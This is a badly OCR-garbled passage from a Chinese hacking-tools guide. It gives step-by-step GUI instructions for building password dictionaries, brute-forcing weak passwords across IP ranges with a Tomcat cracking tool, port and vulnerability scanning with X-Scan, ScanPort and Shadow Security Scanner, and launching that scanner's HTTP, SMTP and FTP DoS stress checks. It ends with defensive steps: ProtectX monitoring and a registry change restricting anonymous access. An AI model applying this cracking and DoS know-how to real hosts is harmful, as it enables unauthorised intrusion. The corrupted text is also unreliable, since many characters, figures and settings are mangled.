生成 字 虚 ...,(1830281K Bytes) (未 响应 ) 


正在 生成 字典 , 这 个 过 程 可 能 会 持续 租 当 一 段 时 间 . 


王 


系统 开始 生成 字典 ， 可 查看 生成 字典 的 进度 。 

2. 能 口令 扫描 器 Tomcat 

当 字 典 文 件 创建 完成 后 ， 驶 可 以 使 用 弱 口 令 扫 描 堪 加 载 目 己 编辑 的 字典 文件 进行 弱 口 
令 扫 描 了 。Tomcat 可 以 根据 需要 加 载 用 户 名 称 字 典 、 密 码 学 典 ,， 对 一 定 IP 范围 内 的 主机 进 
行 弱 口令 扫 摘 。 具 体 的 操作 方法 如 下 。 


STEP01: 运行 “Apache Tomcat.exe” STEP02: 导入 黑客 字典 


焦 Apache Toacat Crack Http:y7gwg.0xzd4F.CnyHLog by:0pen 
起 始 IP: 190 .168 . 0 .5 终止 IF : 190 .168 .0 .254 [工友 | 
| 


Apache Tomcat Crack Http://Ye¥. OxzdF.Cn/BLog by:0Qpen 


起 始 T: | 190.168.0 .5 阁 ItrF: | 190.168. 0 .254 。 [ 添 而 | [开关 
设置 


一 导入 5 已 描 ip: 
a | 


| |147258369 | 


打开 操作 界面 ， 单 击 “ 设 置 ” 按 钮 。 单 击 “ 用 户 名 ”和 “密码 ”列表 框 下 方 的 “导入 ” 按 
钮 ， 可 导入 编辑 好 的 黑客 字典 。 
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客 二 
区 -工具 人 攻 了 


信人 
STEP03: ”开始 扫描 


Apache Toacat Crack Http://Y¥r¥. 0zdF.Cn/BLog by:Open 


ie 0 .5 sn | 190160. 0.254 [0 了 [ 江川 一 单 击 “ 人 和 信息” 按钮 ， 输 入 需要 扫描 的 IP 地 址 范围 。 
单 击 “添加 ”按钮 ， 即 可 将 其 添加 到 地 址 列表 中 。 单 
sr | 击 开始 按钮 ， 即 开始 扫描 。 若 发 现 活动 主机 ， 即 
可 对 主机 的 用 户 名 和 密码 进行 破解 。 


2.1.2 ”扫描 器 X-$Can 查 本 机 隐患 


X-Scan 是 由 安全 焦点 开发 的 一 个 功能 强大 的 扫描 工具 。 它 采用 多 线程 方式 对 指定 IP 
地 址 段 (或 单机 〉 进行 安 全 漏洞 检测 ， 支 持 插件 功能 。 

1. 用 X-Scan 查看 本 机 IP 地 址 

利用 X-Scan 扫描 器 查看 本 机 IP 地 址 的 方法 很 简单 ， 需 要 先 指定 扫描 的 IP 范围 。 由 于 
是 本 机 探测 ， 只 需要 在 “命令 提示 符 ” 窗 口 的 命令 提示 符 下 输入 “ipconfig” 命 令 ， 即 可 得 
知 本 机 的 当前 了 王 地 址 。 


管理 员 : C\Windows\system32\cmd.exe 


Mic Windows [好 本 6 .1.7681] 站 
版 权 所 寄 《c》 2009 Mi oft Corporation 。 避 留 所 有 权利 ， 


sers\MAdmninistrator>ipconf ig 


ndows IP 配置 


以 本 网 适配器 本 地 连接 : 


证 皖 持 全日] DNS 后 过 本 全 生生 
邯 链 按 TIEu6 地 于. -. -- 


本 网 适 配 对 re Network fdapter UMnetil : 


鞍 撞 笠 征 外 SM 
本 地 谤 接 IPv A i .......: fe80::4c8e:68he:23d8:49" 
Tey ttH 1 Tea 


;不 泵 加 IP 地 址 


ee IP 地 址 后 ， 则 需要 将 IP 地 址 添加 到 X-Scan 扫描 器 中 ， 有 具体 操作 步 
骤 如 下 。 
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STEP01: 打开 X-Scan 主 窗口 STEP02: 单 击 “检测 范围 ”选项 


Ry X-Scan v3.3 GUI 
| 文件 (V】 设置 (W) 查 春 (XY) 工具 (Y) Language ”帮助 四 


~ 检测 范围 
由 -全 局 设置 
由 -插件 设置 


厂 从 文件 获取 主机 列表 


普通 信息 | 漏洞 信息 | 错误 信息 | 


国 浏览 此 软件 的 选择 “设置 ”> “扫描 参 “ 国 输入 需要 扫描 的 IP 若 不 知道 输入 的 格 


功能 简介 、 常 见 问 ” 数 ” 菜 单 命令 或 单 击 工具 栏 ”地 址 、IP 地 址 段 。 式 ， 可 以 单 击 “示例 ” 
题解 答 等 信息 。 上 的 “扫描 参数 ”按钮 @ 。 按钮 。 
STEP03: ”查看 示例 格式 STEP04: 返回 “扫描 参数 ”对 话 框 


指定 I 范围: 

[192. 168. 1. 1-192. 168. 1. 88 
www.target.com 地 址 洲 

192.168.0,1 
192.168.0.1/24 厂 从 文件 获取 主机 列表 
192.168.1.1-192.168.2.100 
192.168.0.1,192.168.1.1-10,192.168.2.1/24 


localhost 


192.168.0-1.1 
192.168.0.1-1.254 
192.168.0/24.1 
192.168.0.* 


了 解 有 效 输 入 格式 后 单 击 “ 确 定 ” 按 钮 。 还 可 通过 勾 选 “从 文件 获取 主机 列表 ” 复 选 框 ， 从 
存储 IP 地 址 的 文本 文件 中 读 取 竺 检测 的 主机 地 址 。 


© 读 取 IP 地 址 的 文本 文件 中 ， 每 一 行 可 包含 独立 IP 或 域名 ， 也 可 以 包含 以 


提示 66_ ?9 和 2 分 隔 的 IP 范围 。 


在 IP 地 址 输入 完毕 后 ， 可 以 发 现 扫描 结束 后 目 动 生成 的 “报告 文件 ”项 中 的 文件 名 也 
在 发 生 相 应 的 变化 。 通 常 ， 这 个 文件 名 不 必 手 工 修改 ， 只 需 记 住 这 个 文件 将 会 你 存在 X-Scan 
目录 的 LOG 目录 下 。 设 置 完毕 后 单 击 “ 人 确定 ”按钮 ， 即 可 关闭 对 话 框 。 

3. 开始 扫 摘 

在 设置 好 扫描 参数 之 后 ， 就 可 以 开始 扫 摘 了。 单 击 X-Scan 工具 栏 上 的 “开始 扫 摘 ” 鬼 
ee 即 可 投 设 置 条 件 进行 扫描 ， 同 时 显示 扫描 进程 和 扫描 所 得 到 的 信息 〈 如 下 左 图 所 示 ， 

通过 单 击 右 下 方 窒 格 中 的 “普通 信息 ”“ 漏洞 信息 ”和 “错误 信息 ”选项 卡 ， 奏 看 所 得 到 


EE] 


ST In 
人 和- 工具 全 攻略 


会 全 人 性 
的 相关 信息 )。 在 扫 摘 完成 后 将 目 动 生成 扫描 报告 并 显示 出 来 ， 如 下 右 图 所 示 ， 其 中 显示 了 
活动 主机 IP 地 址 、 存 在 的 系统 漏洞 和 其 他 安全 隐患 ， 同 时 还 提出 了 安全 隐患 的 解决 方 双 。 


本 el ez 


OS DET 一- 


褒 X-Scan v3.3 GU 
文件 M 设置 (W) 童 看 (X) 工具 (Y) Language “帮助 四 
|@lm 旦 | 图 | 国 省 | 加 


田 乱 9 192.168.1.10 人 indors HW Mn 


此 
六 
竺 


wD 
EEE 
ss|ls|lslsls 


名 


192.158.1. jcrosoltt: 5 
192.1658.10 
和 192.158.1. 3htap 
第 192.158.1. 
1 1 
192 0 uninown (1027/rcp) 
一 


8. 上 
类 型 弯 口 /服务 | 支 全 映 油 及 币 天 方案 


EE d: jmum thread: Time(s); 
扫描 进程 和 扫描 所 得 到 的 信息 扫描 报告 


X-Scan 扫描 工具 不 仅 可 扫描 目标 计算 机 的 开放 端口 及 存在 的 安全 隐患 ， 而 且 具 有 目标 
计算 机 物理 地 址 查询 、 检 测 本 地 计算 机 网 络 信 息 和 ping 目标 计算 机 等 功能 。 


EE 


物理 地 址 查询 | ARP query | Whois | Trace route | Ping | 多 项 功 能 
IP 地 址 /主机 名 : 


[www. sina. com. cn f 查 得 主机 各 


: WWW. SINa. COM. Cn. 


Es 。 
5 


-0 


当 所 有 选项 都 设置 完毕 之 后 ， 如 末 想 将 来 还 使 用 相同 的 设置 进行 扫描 ， 则 可 以 对 这 次 
的 设置 进行 保存 。 在 “扫描 参数 ”对 话 框 中 单 击 “ 另 存 ” 投 钮 。 可 将 目 己 的 设 症 保存 到 系 
统 中 。 当 再 次 使 用 时 ， 只 需 单 击 “ 载 入 ”按钮 ， 选 择 已 保存 的 文件 即 可 。 


[oO | = lm 


L 
上田: 插件 设置 指 EIF 范 围 : 


地 址 济 


厂 从 文件 获取 主机 列表 


4. 高 级 设置 
X-Scan 在 默认 状态 下 效果 往往 不 会 达到 最 住 ， 这 个 时 候 就 需要 进行 一 些 高 级 设置 来 让 
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X-Scan 变 得 强大 起 来 。 高 级 设置 需要 根据 实际 情况 来 做 相应 的 设置 ， 和 否则 X-Scan 也 许 会 
因为 一 些 “ 高 级 设置 ”而 变 得 脆弱 不 堪 。 

1) 设置 扫描 模块 。 展 开 “ 全 局 设置 ”选项 之 后 ， 选 取 其 中 的 “扫描 模块 ”选项 ， 则 可 
选择 扫描 过 程 中 需要 扫描 的 模块 ， 如 下 左 图 所 示 ， 在 选择 扫描 模块 时 还 可 在 其 右 侧 窗 格 中 
查看 该 模块 的 相关 说 明 。 

2) 设置 扫描 线程 。 因 为 X-Scan 是 一 款 多 线程 扫描 工具 ， 所 以 在 “全 局 设置 ”选项 下 
的 “并 发 扫描 ” 子 选项 中 ， 可 以 设置 扫描 时 的 线程 数量 (扫描 线程 数量 要 根据 自己 的 网 络 
情况 来 设置 ， 不 可 过 大 )， 如 下 右 图 所 示 。 


一 松 到 宝 
了 全 


括 侍 下 述 : 
区 件 用 于 加 载 扎 洞 检测 脚本 进行 安 
1 又 全 检测 了 


4 插件 设置 


选择 扫描 模块 设置 扫描 线程 数量 

3) 设置 扫描 报告 存放 路 径 。 在 “全 局 设置 ”选项 中 选取 “扫描 报告 ” 子 选 项 ， 即 可 设 
置 扫 摘 报告 存放 的 路 径 ， 并 选择 报告 文件 保存 的 文件 格式 。 知 需要 你 存 目 己 设置 的 扫描 IP 
地 址 范围 ， 则 可 在 勺 选 “ 傈 存 主机 列表 ” 复 选 框 乙 后 ， 输 入 保存 文件 名 称 ， 如 下 顽 岁 所 未 ， 
这 样 以 后 束 可 以 调用 这 些 IP 地 址 范围 了 。 大 用 户 珊 要 在 扫描 结束 时 目 动 生成 报告 文件 并 最 
示 报 告 ， 则 可 勾 先 “扫描 完成 后 目 动 生成 并 显示 报告 ” 复 选 框 。 

4) 设置 其 他 扫描 选项 。 在 “全 局 设置 ”选项 中 选取 “其 他 设置 ” 子 选项 ， 则 可 设 
置 扫 描 过 程 其 他 选项 ， 如 勺 选 “ 跳 过 没有 检测 到 开放 交口 的 主机 ” 复 选 征 ， 如 下 右 疼 
所 示 。 


报告 文件 : 
192 168 1_10 report.html 


报告 文件 类 型 : 
air | 


从 跳 过 没有 响应 的 主机 
个 无 条 件 扫 指 


lv 跳 过 没有 检测 到 开放 端口 的 主机 
[ 使 用 RAT 判断 远程 操作 系统 


[Y 保存 主机 列表 厂 显示 详细 进度 


jy 扫 指 完成 后 自动 生成 并 显示 报告 


扫描 报告 设置 其 他 选项 设置 
5) 设置 扫描 冰 口 。 展 开 “ 插 件 设 置 ”选项 并 选取 “ 痛 口 相关 设置 ” 子 选 项 ， 即 可 设置 
扫描 站 口 范 围 以 及 检测 方式 ， 如 下 左 图 所 示 。 寿 要 扫描 茶 主 机 的 所 有 问 口 ， 则 可 在 “ 待 检 


eg 


ST IF 一 一 


全 人 人 他 
测 痛 口 ”文本 框 中 输入 “1 一 65S535 ”。 
6) 设置 SNMP 扫描 。 在 “插件 设置 ”选项 中 选取 “SNMP 相关 设置 ”了 选项， 用户 
可 以 选取 在 扫描 时 获取 SNMP 信息 的 内 容 ， 如 下 右 图 所 示 。 


工具 全 攻略 


pA 总 DD 
待 检测 端口 : 应 件 识 定 a ee 
7, 9, 13, 19, 21, 22, 23, 25, 53, 79, 80, 110, 111, 119, 135, 139, 143, 443, 445, 465, 51 i 下 SWF 信息 : 


检测 方式: 
[ee 了] 


“CT 相关 设 
一 字典 文件 设置 厅 根据 响应 识别 服务 


设置 痕 口 泥 转 选择 需要 获取 的 SNMP 信息 


7) 设置 NETBIOS 扫描。 选取“ 插件 设置 ”选项 下 的 “NETBIOS 相关 设置 ” 子 选 项 ， 
用 户 可 以 选择 需要 获取 的 NETBIOS 信息 ， 如 下 图 所 示 。 


下 了 ETBIOS 信 息 : 
“所 同 松 允 脚本 没 轩 人 
ji…CGIT 相 关 1i ] 会 直列 表 。_ 
盖 字典 文件 设置 5 


选取 需要 获取 的 NETBIOS 信息 


8) 设置 漏洞 检 训 脚本。 选取“ 插件 设置 ”选项 下 的 “漏洞 检 训 脚本 设置 ” 子 选项 ， 在 
显示 窗口 中 取消 勺 选 “ 全 选 ” 复 选 枉 ， 单 击 “ 选 择 脚 本 ”按钮 ， 即 可 选择 扫描 时 需要 加 载 
的 源 洞 检测 脚本 ， 如 下 图 所 示 。 


园 Select Scripts 


存 为 列表 文件 : 
脚本 列表 : 


…SMIP 相 关 设 置 
j… 了 ETBIOS 相 关 设 置 
… 注 : 辣 检 测 脚 本 设置 厂 全 选 
…CGT 相 关 设 置 
… 字 典 文件 设置 
脚本 运行 超时 (4): 
180 


网络 读 取 超 时 中 ): 


安全 扫 据 处 过 破坏 性 脚本 ) 


人 
是 
本 -本 :本 
> 
玫 
7 Mm 人 Dm mmm Dm 


全 选 | 清除 | 选中 依赖 脚本 | 


Total 46 scripts. 


选择 漏洞 检测 脚本 
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9) 设置 CGI 插件 扫描 。 在 “插件 设置 ”选项 下 选择 “CGI 相关 设置 ” 子 选项 ， 即 可 
选择 扫描 时 需要 使 用 的 CGI 选项 ， 如 下 图 所 示 。 


上 -端口 相关 设置 
:SMWP 相 关 设 置 
|…METBIOS 相 关 设 置 
F 二 检测 jj 本 设置 
本 CGI 相 天 1& 百 


一 字典 文件 仅 置 


个 0. 使 用 "GET" 方 法 

从 1. 用 "HEAD" 蔡 换 "GET“ 

个 2. 用 “PF0ST" 着 换 “GET” 

个 3. 用 “GET / HTTP/1. 0hrhnHeader:" 车 换 “GET" 


个 4. 用 "GET / liniexhtn ?paran=" 着 换 “GET” 
个 5. 用 “GET %00“ 僚 换 “GET" 选取 Cal 选项 
厂 6. 多 个 “/* 或 * 
厂 7. 7 与 "人 \ 互 换 
厂 8. 用 “人 ab》 昔 换 *< 空 格 六 


10) 设置 字典 文件 。 在 “字典 文件 设置 ”选项 中 可 选择 需要 的 破解 和 字典 文件 ， 双 击 
即 可 打开 文件 列表 ， 如 下 图 所 示 。 在 设置 好 所 有 选项 之 后 ， 单 击 “ 确 定 ” 按 钮 ， 即 可 完 
成 扫描 参数 的 设置 。 


查找 范围 I): | DD aat "| 全 茎 图 
| RE dic 2y 名 称 修改 日 期 

. a py 二 fn 位 mail_user.dic 2005/5/17 21:10 
| 六 : i g 

| nntp_user.dic 2005/5/17 21:10 

.字典 文件 设置 ee | 国 nt_userdic 2005/5/17 21:10 

| 1 ee Ee | 齐 面 国 :nmp_pass.dic 2005/5/17 21:10 

.Mdat\weak pass. die | 司 socks_userdic 2005/5/17 21:10 

.dat\mail user. dic 二 re > A 

; 局 sql_user.dic 2005/5/17 21:10 


telnet_user.dic 2005/5/17 21:10 
vnc_pass.dic 2005/5/17 21:10 
国 weak_pass.dic 2005/5/17 21:10 
国 www_user.dic 2005/5/17 21:10 逃 


4 | 


文件 名 作 ) : socks_user. dic 
文件 类 型 (7): |[*. dic | 取消 | 
厂 以 品读 方式 打开 (R) 


A 


选择 破解 字典 文件 


2.1.3 ”Free Port Scanner 与 $canp0rt 等 常见 扫描 工具 


入 侵 者 律 音 利用 一 些 专 门 的 扫描 工具 对 目标 主机 的 端口 进行 扫描 ， 目 前 可 以 用 来 扫描 
并 口 的 扫 摘 工具 很 多 ， 下 面 葡 介绍 两 种 第 见 的 扫描 工具 。 

1. Free Port Scanner 

Free Port Scanner 是 一 天 端口 扫 摘 工具 ,用 刀 可 以 快速 扫 摘 全 部 端口 ， 也 可 以 制定 扫 摘 
泡 围 。 使 用 Free Port Scanner 进行 端口 扫 摘 的 具体 操作 步骤 如 下 。 


39 磊 


FE 
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NUy/ 


全 人 人 他 
STEP01: 运行 “Free Port Scanner” 


CD 


JsEammer 2 二 
er TE 


Download Now! | 
Download Now! | 


Scan Parameters 
.168 . 1 .100 [WY Show Closed Port: 
TCF 


21-23, 25, 53, 80, 11d 135, 137-139, 443, 445, 1080, 1433, 3128, 3306, 8080 


STEP02: 开始 扫描 


Free Port Scannec ne 


IF address |Portnm..| |Ports... |Port Nane |Description 


4| = 于 [| 


在 “IP” 文 本 框 中 输入 目标 主机 的 IP 地 址 ， 再 勾 选 


“Show Closed Ports” 复 选 框 。 


STEPO3: 


EreelpordScanne 


Fast Network Port i 


LEARN MORE 
Download Now! | 
Download Now! | 


只 对 目标 主机 开局 的 端口 进行 扫 


192 .168 . 1 .100 TT Show Closed Port: 
21-23, 25, 53, 80, 110, 135, 137-139, 443, 445, 1080, 1433, 3128, 3506 3080 
Description 


op 192. 188. 1.100 139 
wp 192. 168. 1. 100 445 


Stop | 


netbios-ssn netbios session service 


microsoft-ds microsoft-ds 


d i 
轩 国 固 回 加 国 国 罗 上 加 固 区 加 图 思 图 央 国 国 图 赂 回国 加 图 国 癌 回 图 图 回 图 图 国 国 图 回国 图 因 图 轩 图 辕 加 图 四 


2. ScanPort 


LEARN MORE 


Download Now! | 
Dowrnload Now! | 


1-23, 25, 53, 80, 110, 135, 137-139, 443, 445, 1080, 1433, 3128, 3306, 8080 stlop 


[Port mn... |PortS... |Port Nane |Description | 
X 192. 168. 1. 100 21 Closed ftp file 

X 192. 168. 1. 100 Closed ssh secure 

X 192.168.1.100 Closed telnet telnet 

X 192.168.1.100 Closed smtp Simple mail transfer 

X 192. 1863. 1. 100 Closed domain 

X 192. 168. 1. 100 Closed http 

X 192. 168. 1. 100 Closed pop3 

中 192. 168.1.100 Dpen epnap 

X 192. 168. 1. 100 Closed netbios-ns 
X 192. 168. 1. 100 Closed netbios-dem 
中 192. 168.1. 100 0pen netbios-ssn 
X 192. 168. 1. 100 Closed https 

中 192. 168.1. 100 Dpen microsoft-—ds microsoft-ds 

X 192.168.1.100 Closed socks socks 

X 192. 168, 1. 100 Closed ms-sql-s microsoft-sgl-server 
X 192. 188. 1. 100 Closed ndl-aas Active 

X 192. 188. 1. 100 Closed mysql 

X 192. 168. 1. 100 Closed http-alt 


-Scan Parameters— 一 一 一 i 
IP 192 .168 . 1 .100 [IY Show Closed Port: 


domain name server, Tiame- domain Eerver 
hypertext transfer protocol, worlld wide 
pop version 3, posiloffice v.3, post offi 
dece endpoint resolution, locatiokh servic 
netbios name service 

netbios datagram service 

netbios session service 

secure http (ssl), http protocol|l over +t1 


m 
common http proxy/second web serprer port. 


= 
加 加 隔 图 轩 国 加 名 央 辐 加 吧 加 加 册 且 因 罗 罗 加 误 旭 加 周 加 加 如 和 风 于 二 国庆 卫 加 罗 导 区 名 了 


单 击 “Scan” 按 钮 ， 即 可 扫描 到 目标 主机 的 全 部 端 
口 ， 其 中 绿色 标记 是 开启 的 端口 。 


在 “IP” 文 本 框 中 输入 要 扫描 的 IP 地 址 之 后 ， 取 消 
勾 选 “Show Closed Ports” 复 选 框 ， 单 击 “Scan” 
按钮 ， 扫 描 完毕 即 可 显示 扫描 结果 ， 从 扫描 结果 中 
可 以 看 到 目标 主机 开局 的 关口 。 


ScanPort 软件 不 但 可 以 用 于 网 络 扫描 ， 同 时 还 可 以 探测 指定 卫 及 端口 ， 速 度 比 传统 软 


件 快 ， 且 文 持 用 户 目 设 卫 端口 功能 


增加 了 其 灵活 性 。 上 基体 的 使 用 方法 如 下 。 


EM 
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STEP01: 运行 ScanPort 主 程序 STEP02: 查看 扫描 结果 


主 自 岂 罕 主 自 L 
起 始 IE: 「192 . 1686.1 .od 起 始 TP [192. 168 . “i 
结束 IP :| 192 .166 . 1 .255 ph 1 .255 
端口 呈 : [ao, 139, 440-445 端口 号 : Po, 139, 440-445 


192. 168.1.10: 


超 时 :| ”200 ”之 秘 
线程 数 :| 10 


设置 起 始 IP 地 址 、 结 束 IP 单 击 “ 扫 ”开始 进行 扫描 ， 从 扫描 结果 中 可 以 看 出 IP 地 址 段 中 
地 址 及 要 扫描 的 端口 号 。 描 ” 按钮。 ”开启 的 计算 机 端口 。 


2:1.4 用 SS 扫 朱 器 实施 扫 摘 


SSS (Shadow Security Scanner) 是 一 亚 和 著名 的 系统 漏洞 扫 朱 堪 ， 可 对 很 大 范围 内 的 系 
统 漏洞 进行 安 人 全、 高 效 、 可 靠 的 安全 检测 ， 其 系统 扫描 的 速度 与 精度 足以 让 用 己 敢 与 那些 
专门 入 侵 他 人 计算 机 系统 的 黑客 “叫板 ” 

利用 SSS 扫 挡 堪 对 系统 漏洞 进行 扫 摘 的 具体 操作 步骤 如 下 。 
STEP01: 运行 SSS 扫描 器 设置 扫描 规则 


New session wizard 


”| 国 加 | 定 国 


| AT a lor one Please. select rule for new session and enter comments. Step 1 of 2 


Rule name ee 


dd rule | lead to oR or han gs Erp 
i we i scanning 六 可 二 
[1..65355] and vulnerabilities of the remote 
| Delete i E ] computer ecept for "Dos tests" which ma 
| lead to lock-ups or hangs and 
pe verlfication via NetBIOS is Switch 


a 


Description of session: 


单 击 工具 栏 上 的 “New session” 按 钮 。 用 户 可 以 选择 预 设 的 扫描 规则 ， 也 可 单 击 Add rule 
按钮 添加 新 的 规则 。 
STEP03: 创建 新 的 扫描 规则 STEP04: 设置 扫描 选项 


Create new rule 二 securiy Scanner Rules 


DO Create copy of the rule 


| General 
lnslallation of base value of scanning regulation 


Preferences 
Protocol identification on found ports 
回 Don't get banners from port 


Complete Scan 


夯 ) Create default rule 
Please., enter new rule mame. 


Host Ping type 
| Perform scan on hosts that do not respond to pings 


Multilookup IP Scan 


回 Scan all ports in range 
Start port End port 
1 漳 | |65535 向 | 
< 回 Do nat lookup IP addresses 
:Default Logins 


本 Mise 


| new rule 


创建 新 的 扫描 规则 ， 单 击 “OK” 按 钮 。 图 勾 选 扫描 规则 。 单 击 “OK” 按 钮 。 
根据 提示 输入 信息 。 


4 由 


Pe 
名- 工具 全 攻略 
全 人 人 他 


ES 返回 设置 扫描 项 目的 窗口 STEPO6: 添加 扫描 的 目标 计算 机 


New session wizard New session wizard 


Please, select rule for new session and enter comments. Step 1 of 2 Please. add host or ip address for scanning Step 2 of 2 


| | Bs eMoOre Co ls 
: except for " : pic "1 Ma lia 
点 dd rule | ead to laock-ups or hangs and passWor 


verification via NetBIlOS is 


TT 


remote 
Delete rule a Delet$ host 
ty verification via NetBIOS is switcr 


- 


过 人 ~ 和 上 Do » VW 未 


Description of session: 


| 


单 击 “Next” 按 钮 。 单 击 “Add host” 按 钮 。 
STEP07: 添加 目标 计算 机 


ee 


| Select hosts to add 
辕 ) Host 


SS 选取 “Host” 单 选 按 钮 ， 可 添加 单一 目标 计算 机 的 
Name or IP。 里 训 国 ll IP 地 址 或 计算 机 名 称 。 
© es 一 一 一 选取 “Hosts range” 单 选 按钮 ， 可 添加 一 个 IP 地 址 
Is | EE - - - 范围 。 


aas 一 一 选取 “Hosts from file” 单 选 按钮 ， 可 通过 指定 已 存 
在 的 目标 计算 机 列表 文件 添加 目标 计算 机 。 


名 加 Host groups: 
Group name Badd... 


ER 


选取 “Host groups” 单 选 按钮 ， 则 通过 添加 工作 
组 的 方式 添加 目标 计算 机 ， 并 设置 登录 的 用 户 名 称 


wirtual HTTP Hosts NetBios [for remote registry] 和 密 码 
ss 


| 
User name 


Delete... 


Password 


在 添加 目标 计算 机 之 后 ， 单 击 “Add ”按钮 ， 即 可 
完成 日 标 计算 机 的 添加 。 


STEP08: 完成 扫描 项 目的 创建 STEP09: 返回 SSS 主 界 面 


New session wizard i EB 5 |] @®@ . "i 加 已 | 钾 加 
Please, add host or ip address for scanning. Step 2 of 2 L Session ,| ~ i Add host Deletehost , § Options.. Rules. R 


audits TCPPorts UDP Ports 


192.168.0.10 " 


名 dd host 
| Edit host 
Delete host 


单 击 “Next” 按 钮 。 单 击 该 按钮 ， 开 始 对 目标 计算 机 进行 扫描 ， 可 在 
“Statistics” 选 项 卡 中 查看 扫描 进程 。 
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STEP10: 切换 至 “Vulnerabilities” 和 选项 卡 _STEP11: 进行 DoS 安全 性 检测 


且 File View Acions Tools Window Help 
< 


» | 


(Dy 
Start scan Stop scan 
Scannef | | Scanner | Vulnerabaies | Statistics | 


| 号 和 
New session 。 » Add host Delete host 、; Options.., 


42.1b8.0. 
192.168.0.10 
1392168010 
192168010 


HelpAssistant . User Nevet Logged On 
SUPPORT_388945a0 . User Never Logged On 


单 击 “DoS Checker” 
选项 ， 选 择 检测 的 项 目 。 


查看 危险 程序 、 
补救 措施 等 内 容 。 


STEP12: 开始 DoS 检测 


Dos Checker 1.03 


Dos Checker 
Step 1 of 2 


Server Status : Not Started 
Time : 00:00:00 
Request : 0 

Threads : 0 


Start> 


] 
查看 检测 结果 。 
STEP14: SSS 选项 设置 


i Security Scanner Options 
Dptions | -General 


Installation of your connection Speed pararneters and capacity of your computer. 


Total threads 


Ping time out 


Data time out 


On 


设置 常规 选项 。 


ES 


Dos Checker 1.03 


Dos [Checker 
Step 1 of 2 


HTTP Stress 


Host : 


HTTP Stress 127001 


Threads : 
好 0 


SMTP Stress _ | Delay (secl: 


I 
涡 Packets slze : 


FTP Stress 


STEP13: 返回 主 界 面 


; New session 


要 = 


Language 
Scanner a U 
pdate 
EE 
莉 > Terminate license 


Base SDK 


[各 


Base SDK 
Scripts 
DoS Checker 


Do5 Checker 


选择 “Tools”>“Options” 菜 单 。 


要 - Add host Delete host 


设置 扫描 的 线程 数 之 后 ， 单 击 “Start” 按 钮 。 


vw = 


STEP15: 切换 至 “Scanner” 选 项 卡 


i Security Scanner Options 


Dptions Scanner 
Installation of parameters of the scanner work control. 
Scanner - 
加 Autostart after adding IP address 
网 Delete empty host after completing scan 


Protection 
[| Password protection of program start enabled. 


Change Password 


Loggin 
回 Generate log file of scanner operations. 
|D: 安 装 *SSSsDebugLog.dat 
AutoSave 
回 AutoSave Session file. 
|“ses 


设置 扫 摘 选项 。 


客 过 
-区 -工具 人 攻 了 


命 人 他 他 


2.1.5 用 ProteCt 实现 扫描 的 反击 与 追踪 


ProtectX 是 一 球 在 用 户 连 接 网 络 时 保护 计算 机 的 工具 ， 可 以 同时 监视 20 个 端口 ， 还 可 
以 帮助 追踪 攻击 者 的 来 源 。 一 旦 任何 人 尝试 入 侵 连 接 到 用 户 的 计算 机 ， 即 可 发 出 声音 警告 
并 将 入 侵 者 的 卫 位 址 记录 下 来 。 

1. ProtecX 实用 组 件 概 述 

ProtectX 安装 过 程 与 一 般 软 件 安装 过 程 类 似 ， 这 里 不 再 葡 述 。 在 安装 ProtectX 后 重 局 
系统 ， 即 可 在 Windows 系统 的 通知 栏 中 看 到 ProtectX 图 标题 。 双 击 该 图 标 即 可 显示 其 操作 
界面 ， 窗 口中 间 显 示 的 是 当前 本 机 状态 信息 。 


刘 ProtectX Professional Edition 4 


Services Local Utilities Internet Utilities Preferences Help 


a 
日 6 
日 6 
目 
日 6 


四 
NNNNNN 
nnnnann 
下 下 下 下 下 下 
AH 
朋 人 闪闪 他 


ProtectX 初始 界面 


ee 


[Er | 
曙 脚 学时 


ProtectX 提供 了 几 项 实用 功能 组 件 , 依次 是 端口 安全 (Port Sentry)、 特洛伊 安全 (Trojan 
Sentry) 和 Identd 服务 〈Identd Server) 等 。 

1) 奖 口 安全 。 训 口 安全 吏 是 端口 扫描 监视 器 ， 在 TCP 疹 口 1 上 监听 ， 如 果 有 扫 摘 活 
动 触发 到 1 号 端口 ， 则 Port Sentry 将 会 报警 ， 如 下 左 图 所 示 。ProtectX 即 可 反 跟 蹊 对 方 ， 
丛 询 其 域名 、 授 调 路 由 信息 ， 并 显示 所 裤 测 到 的 扫描 信息 ， 如 下 右 图 所 示 。 


3 ProtectX Professional Edition 4 


Services Local Utilities Internet Utilities Preferences Help 


e at httpss//www.arin.Net /whois_t 


2613 直 18 月 38 晶 84:25;:31 下 年 :Whois Resyults For 192.168.1.18 Completed 


WARNI [ee 2613 寻 10 月 36 日 64:26:15 下 午 : 
Traceroute Started 6 
6: 15 


:Tra i192.168,.1.18 
m :Hop 409 各 e837 1 LO 一 4L86D1ETP6KUSIUW 
Connection Attempted 
8 in Ost: ee 168, de Ee . 
9 plete, MLL ongds; 日 
Ete 


0 
秆 村 三 尾村 村 村 wy 村 寺村 忻 ; 
Pat art Pe 
TODID Sm 
TT 


Pe 


Le ES to 4L8QD1ETPBKYS1W 
已 


端口 安全 的 报警 信息 显示 所 截击 到 的 扫描 信息 

2) 特洛伊 安 人 全。 特洛伊 安全 是 指 在 一 些 木马 钊 用 端口 上 进行 监听 ， 一 旦 友 现 有 人 试图 

连接 这 些 端口 ， 即 报警 

3) Identd 服务 。 可 在 计算 机 上 打开 一 个 安全 Identd 服务 ， 初 级 用 户 最 好 不 要 打开 这 个 
服务 。 

2. 防御 扫描 器 入 侵 

有 了 ProtectX 的 保护 ， 对 于 一 般 的 扫 摘 攻击 大 家 束 可 以 不 用 担心 了 。 不 过 ， 仅 仅 依 靠 
这 个 工具 ， 还 远 远 谈 不 上 高 枕 无 忧 ， 还 需要 提前 做 好 防御 扫 拉 入 侵 的 准备 。 

1) 对 于 Windows 用 户 ， 要 修改 注册 表 ， 茜 止 匿 名 用 户 对 IPC$ 的 访问 。 首 先 单 击 “ 开 
始 ” 按 钮 ， 在 弹出 的 “开始 ”菜单 中 单 击 “ 运 行 ”命令 ， 如 下 图 所 示 。 这 时 会 阐 出 “运行 ” 
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对 话 框 。 在 其 中 输入 “regedit” 命 令 后 单 韦 “确定” 按钮， 即 可 打开 注册 表 编 辑 费 ， 如 下 
石 图 所 示 。 


包 划 58 大大 


所 


忆 司 Monitor Tomcat 


Windows 将 根据 您 所 输入 的 名 称 ,为 您 打开 相应 的 程序 、 
文件 去 、 文 档 或 Internet 资源 ， 


输入 “regedit” 命 令 


单 击 “ 运 行 ”按钮 


修改 方法 是 在 注册 表 编 辑 器 中 展开 HKEY LOCAL MACHINF\SYSTEM\CurrentControl 
Set\ Control\Lsa 分 支 ， 找 到 restrictanonymous 并 将 其 值 改 为 1， 如 下 图 所 示 。 


